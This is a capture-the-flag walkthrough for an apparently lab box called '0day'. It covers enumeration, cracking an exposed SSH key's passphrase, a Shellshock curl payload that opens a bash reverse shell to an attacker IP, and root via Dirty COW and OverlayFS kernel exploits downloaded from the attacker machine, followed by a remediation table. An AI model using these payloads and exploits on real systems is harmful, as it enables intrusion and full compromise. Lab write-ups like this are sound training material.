Target IP: 0day.thm (Requires /etc/hosts entry) Difficulty: Medium Objective: User (user.txt) & Root (root.txt) Flags

1. Executive Summary

The target “0day” is an Ubuntu 14.04 server hosting a vulnerable Apache web server. Initial access is gained via the Shellshock vulnerability (CVE-2014-6271) present in a CGI script located at /cgi-bin/test.cgi. Privilege escalation is achieved by exploiting an outdated Linux Kernel (3.13.0) using either Dirty COW (CVE-2016-5195) or OverlayFS (CVE-2015-1328).

Key TTPs (MITRE ATT&CK):

  • T1595 (Active Scanning): Port enumeration via Nmap.
  • T1190 (Exploit Public-Facing App): Shellshock execution via HTTP Headers.
  • T1068 (Privilege Escalation): Kernel exploitation (Dirty COW / OverlayFS).

2. Operational Setup (The “Menial” but Critical Steps)

Before interacting with the target, ensure your environment is stable.

A. Host Configuration

Don’t memorize IPs. Map the target to a hostname.

# Replace 10.10.x.x with your target IP
echo "10.10.x.x 0day.thm" | sudo tee -a /etc/hosts

B. Terminal Management (Tmux)

  • Pane 1 (Ops): For running commands (nmap, curl).
  • Pane 2 (Listen): nc -lvnp 6969 (Your callback handler).
  • Pane 3 (Notes): vim notes.md or similar.

3. Enumeration & Discovery

A. Network Scanning

We start with a service version and default script scan.

nmap -sC -sV -oA nmap/0day 0day.thm

Results:

  • 22/tcp (SSH): OpenSSH 6.6.1p1 (Ubuntu 14.04).
  • 80/tcp (HTTP): Apache 2.4.7 (Ubuntu).
  • Observation: Apache 2.4.7 is quite old. The OS version (Ubuntu) hints at an older kernel.

B. Web Enumeration

We perform directory brute-forcing to map the application structure.

# Using secLists 'raft-small-words' is efficient for CTFs
gobuster dir -u http://0day.thm -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x cgi,sh,php,txt -o content/gobuster.out

Critical Findings:

  1. /cgi-bin/ (Status: 301) -> High Priority.
  2. /backup/ (Status: 301) -> Contains id_rsa (SSH Key).
  3. /secret/ (Status: 301) -> Likely a rabbit hole.
  4. /admin/ (Status: 301) -> Forbidden/Empty.

C. Vulnerability Scanning (Nikto)

A targeted scan on the web server confirms our suspicion about /cgi-bin.

nikto -h http://0day.thm

Output:

+ OSVDB-3092: /cgi-bin/test.cgi: This might be interesting...


4. Analysis: The “Unused” Rabbit Hole

Most writeups skip this, but a real pentest requires verifying all credentials.

The Asset: An RSA Private Key found in http://0day.thm/backup/id_rsa. The Check:

  1. Download & Permissions:
wget http://0day.thm/backup/id_rsa
chmod 600 id_rsa
  1. Crack the Passphrase: The key is encrypted. We use ssh2john and john to crack it.
/usr/share/john/ssh2john.py id_rsa > id_rsa.hash
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash

Result: Passphrase is letmein.

  1. The Login Attempt: We try to SSH using common usernames derived from the OS (root, ubuntu, www-data) or guessable names (admin, backup).
ssh -i id_rsa ubuntu@0day.thm
# Result: Permission denied (publickey).

Conclusion: This is a Dead End. There is no matching user on the system for this key. It serves as a distraction from the web vector.


5. Initial Access: Shellshock

The Mechanics (Why it works)

Shellshock exploits a flaw in Bash where it executes commands appended to function definitions in environment variables. Apache mod_cgi converts HTTP headers (User-Agent, Referer, etc.) into environment variables (e.g., HTTP_USER_AGENT).

If we send () { :; }; <COMMAND>, the CGI script processes the header, passes it to Bash, and Bash accidentally executes the <COMMAND>.

Manual Exploitation (The Professional Way)

Avoid Metasploit for this. Use curl to understand the traffic.

  1. Prepare Listener: nc -lvnp 6969
  2. Send Payload:
curl -H "User-Agent: () { :; }; /bin/bash -c 'bash -i >& /dev/tcp/10.10.X.X/6969 0>&1'" \
http://0day.thm/cgi-bin/test.cgi

Note: If bash -i fails, try sh -i or /bin/sh.

Success: We catch a reverse shell as www-data.


6. Post-Exploitation & Privilege Escalation

A. Stabilization

First, we escape the unstable shell.

python3 -c 'import pty; pty.spawn("/bin/bash")'
# Press Ctrl+Z
stty raw -echo; fg
# Press Enter twice
export TERM=xterm

B. Enumeration

  • uname -a -> Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP ... 2014
  • cat /etc/issue -> Ubuntu 14.04.1 LTS

Vulnerability: Linux Kernel < 3.19 is highly susceptible to Dirty COW and OverlayFS.

C. Vector 1: Dirty COW (The Standard Path)

This exploits a race condition in the Copy-On-Write mechanism.

  1. Exploit: searchsploit dirty cow (Look for cowroot.c or similar).
  2. Problem: The target is missing compilation paths.
  3. Fix:
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
  1. Compile & Run:
gcc dirty.c -o dirty -pthread
./dirty
# Enter password 'password123'
su firefart

Risk: Dirty COW can sometimes crash the box or leave the filesystem in an unstable state.

D. Vector 2: OverlayFS (The “Better” Path)

This is the “unused” method you asked for. It is often cleaner and more reliable on this specific kernel version (3.13).

Exploit: searchsploit 37292 (CVE-2015-1328). This exploit leverages the overlayfs filesystem to gain root without the complex race condition of Dirty COW.

  1. Transfer: Host 37292.c on your attacker machine (python3 -m http.server 80).
  2. Download on Target:
cd /tmp
wget http://10.10.X.X/37292.c
  1. Compile:
gcc 37292.c -o overlay
  1. Execute:
./overlay

Result: Instant # root shell. No password changing required, less noise.


7. Remediation (Blue Team)

VulnerabilityPatch / Mitigation
ShellshockUpgrade bash immediately. ( apt-get install --only-upgrade bash). Detect via Snort rules looking for () { :; }; pattern in HTTP headers.
DirtyCOW/OverlayFSUpdate Linux Kernel to a supported LTS version (e.g., 5.4+). Prevent compilers (gcc) from being accessible to standard users on web servers.
SSH Key ExposureRotate the compromised key immediately. Ensure backup directories are not web-accessible (chmod 700 and Apache .htaccess deny).